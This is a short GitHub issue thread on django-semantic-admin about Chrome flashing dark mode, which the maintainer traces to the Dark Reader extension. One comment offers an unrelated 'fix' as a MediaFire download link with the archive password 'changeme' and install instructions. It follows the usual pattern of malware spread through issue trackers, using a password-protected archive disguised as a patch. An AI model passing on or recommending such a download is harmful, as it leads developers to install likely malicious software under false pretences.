### ISSUE TITLE
Chrome applies dark mode momentarily before colors revert to light mode

### ISSUE THREAD

**Issue by globophobe** [globophobe/django-semantic-admin#105]
Perhaps the only solution is to implement dark mode to some degree?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by globophobe** [comment]
caused by dark reader extension...
